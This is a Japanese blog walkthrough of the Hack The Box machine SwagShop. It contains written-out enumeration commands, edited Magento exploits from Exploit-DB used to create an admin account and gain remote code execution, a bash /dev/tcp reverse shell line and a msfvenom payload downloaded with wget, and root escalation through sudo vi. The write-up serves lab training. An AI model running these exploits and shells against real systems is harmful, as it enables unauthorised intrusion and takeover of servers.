はじめに
筆者は Hack the Box 初心者です。 何か訂正や補足、アドバイスなどありましたら、コメントか Twitter までお願いします。 さんぽし(@sanpo_shiho) | Twitter
cheat sheet
以下で cheat sheet としてツールの使い方などをまとめています。参考にしてください。 github | sanposhiho/MYCHEATSHEET
machine について
難易度は easy です
nmap
kali@kali:~$ nmap -sC -sV 10.10.10.140
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-19 10:12 EDT
Nmap scan report for 10.10.10.140
Host is up (0.27s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
| 256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
|_ 256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home page
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.17 seconds80 番の調査
gobuster
kali@kali:~$ gobuster dir -u http://10.10.10.140 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t 40 -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.140
[+] Threads: 40
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt
[+] Timeout: 10s
===============================================================
2020/06/18 19:49:21 Starting gobuster
===============================================================
/index.php (Status: 200)
/media (Status: 301)
/includes (Status: 301)
/lib (Status: 301)
/install.php (Status: 200)
/app (Status: 301)
/js (Status: 301)
/api.php (Status: 200)
/shell (Status: 301)
/skin (Status: 301)
/cron.php (Status: 200)
/LICENSE.txt (Status: 200)
/var (Status: 301)
/errors (Status: 301)
searchsploit
kali@kali:~$ searchsploit Magento
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Magento 1.2 - '/app/code/core/Mage/Admin/Model/Session.php?login['Username']' Cross-Site Scripting | exploits/php/webapps/32808.txt
Magento 1.2 - '/app/code/core/Mage/Adminhtml/controllers/IndexController.php?email' Cross-Site Scripting | exploits/php/webapps/32809.txt
Magento 1.2 - 'downloader/index.php' Cross-Site Scripting | exploits/php/webapps/32810.txt
Magento < 2.0.6 - Arbitrary Unserialize / Arbitrary Write File | exploits/php/webapps/39838.php
Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution | exploits/php/webapps/37811.py
Magento Server MAGMI Plugin - Multiple Vulnerabilities | exploits/php/webapps/35996.txt
Magento Server MAGMI Plugin 0.7.17a - Remote File Inclusion | exploits/php/webapps/35052.txt
Magento eCommerce - Local File Disclosure | exploits/php/webapps/19793.txt
Magento eCommerce - Remote Code Execution | exploits/xml/webapps/37977.py
eBay Magento 1.9.2.1 - PHP FPM XML eXternal Entity Injection | exploits/php/webapps/38573.txt
eBay Magento CE 1.9.2.1 - Unrestricted Cron Script (Code Execution / Denial of Service) | exploits/php/webapps/38651.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
kali@kali:~$ searchsploit -p 37977
Exploit: Magento eCommerce - Remote Code Execution
URL: https://www.exploit-db.com/exploits/37977
Path: /usr/share/exploitdb/exploits/xml/webapps/37977.py
File Type: ASCII text, with CRLF line terminators
Copied EDB-ID #37977's path to the clipboard.これを使ってみます
https://www.exploit-db.com/exploits/37977
37977.py の中を色々弄ります(コメントになってない余計な部分の削除、target.com を 10.10.10.140/index.php に)
kali@kali:~$ python 37977.py
WORKED
Check http://10.10.10.140/index.php/admin with creds forme:forme
login できました
37811.py
https://www.exploit-db.com/exploits/37811
kali@kali:~$ searchsploit -p 37811
Exploit: Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution
URL: https://www.exploit-db.com/exploits/37811
Path: /usr/share/exploitdb/exploits/php/webapps/37811.py
File Type: Python script, ASCII text executable, with CRLF line terminators
Copied EDB-ID #37811's path to the clipboard.これを使います この exploit がそれはもういろんなエラーを吐くんですわ 以下の変更を加えて解決しました。
以下の二行をコメントアウト 参考:https://forum.hackthebox.eu/discussion/2304/swagshop-rce
#br.form.new_control('text', 'login[username]', {'value': username}) # Had to manually add username control.
#br.form.fixup()url の 7d を 2y に変更(実際に url にアクセスすればわかりますが、7d とか 2y は期間を表しています(7days, 2years)
- request = br.open(url + 'block/tab_orders/period/7d/?isAjax=true', data='isAjax=false&form_key=' + key)
+ request = br.open(url + 'block/tab_orders/period/2y/?isAjax=true', data='isAjax=false&form_key=' + key)kali@kali:~$ python 37811.py 'http://10.10.10.140/index.php/admin' "uname -a"
Linux swagshop 4.4.0-146-generic #172-Ubuntu SMP Wed Apr 3 09:00:08 UTC 2019 x86_64 x86_64 x86_64 GNU/LinuxRCE が通りました
shell をとる
bash -i >& /dev/tcp/10.10.14.8/1212 0>&1はうまく行かなかったので msfvenom のスクリプトを upload する方法を取りました。
kali@kali:~$ msfvenom -p linux/x86/shell/reverse_tcp LHOST=10.10.14.8 LPORT=1212 -f elf > shell.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
kali@kali:~$ python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
10.10.10.140 - - [19/Jun/2020 09:53:12] "GET /shell.elf HTTP/1.1" 200 -kali@kali:~$ python 37811.py 'http://10.10.10.140/index.php/admin' "wget http://10.10.14.8:8000/shell.elf"
kali@kali:~$ python 37811.py 'http://10.10.10.140/index.php/admin' "chmod +x ./shell.elf"
kali@kali:~$ python 37811.py 'http://10.10.10.140/index.php/admin' "./shell.elf"msf5 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (linux/x86/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.14.8 yes The listen address (an interface may be specified)
LPORT 1212 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.8:1212
[*] Sending stage (36 bytes) to 10.10.10.140
[*] Command shell session 1 opened (10.10.14.8:1212 -> 10.10.10.140:49426) at 2020-06-19 09:56:01 -0400
whoami
www-data
python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@swagshop:/var/www/html$PE
www-data@swagshop:/var/www/html$ sudo -l
sudo -l
Matching Defaults entries for www-data on swagshop:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on swagshop:
(root) NOPASSWD: /usr/bin/vi /var/www/html/*
www-data@swagshop:/var/www/html$ sudo /usr/bin/vi /var/www/html/index.phpvim 内で shell を起動すると
:!/bin/sh
/**
* Magento
*
* NOTICE OF LICENSE
*
* This source file is subject to the Open Software License (OSL 3.0)
* that is bundled with this package in the file LICENSE.txt.
* It is also available through the world-wide-web at this URL:
* http://opensource.org/licenses/osl-3.0.php
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to [email protected] so we can send you a copy immediately.
*
* DISCLAIMER
*
* Do not edit or add to this file if you wish to upgrade Magento to newer
* versions in the future. If you wish to customize Magento for your
* needs please refer to http://www.magentocommerce.com for more information.
*
* @category Mage
* @package Mage
@
:!/bin/shroot が取れます
# whoami
whoami
root終わりに
PE は典型的なものでした。37977.py の改変が大変だった…
shell のとり方別解
別解というほどでもないですが、linux/x86/shell_reverse_tcpを payload に使うと nc でも安定した shell が取れます
